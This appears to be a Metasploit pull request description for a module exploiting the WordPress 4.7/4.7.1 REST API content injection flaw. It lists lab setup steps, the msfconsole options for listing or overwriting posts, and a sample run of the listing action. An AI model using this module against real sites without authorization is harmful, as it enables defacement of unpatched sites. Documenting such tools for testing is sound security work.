1.7 KiB
1.7 KiB
Feature description:
This adds a module for the WordPress 4.7/4.7.1 content injection vulnerability detailed at https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html.
Verification steps:
- Download https://wordpress.org/wordpress-4.7.1.tar.gz
tar xf wordpress-4.7.1.tar.gz -C /var/www/html --no-same-owner- Prevent auto-update with either:
- Ensure the install dir is not writable by the web user
- Add the following to
wp_config.php(after install)
define( 'WP_AUTO_UPDATE_CORE', false ); define( 'AUTOMATIC_UPDATER_DISABLED', true ); - Install Wordpress
- Start
msfconsole use auxiliary/scanner/http/wordpress_content_injection- Set
rhost,rportandTARGETURI - Set
ACTIONto eitherLISTorUPDATE - Set
POST_IDandPOST_TITLE,POST_CONTENT, and/orPOST_PASSWORD - Run the module
Sample run:
This is just the LIST action...
msf auxiliary(wordpress_content_injection) > run
[*] REST API found in HTML document
Posts at https://[redacted]:443/ (REST API: /wp-json/wp/v2)
============================================================
ID Title URL Password
-- ----- --- --------
1 Hello world! https://[redacted]/2016/10/hello-world/ No
87 Hello world! https://[redacted]/2016/08/hello-world-2/ No
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wordpress_content_injection) >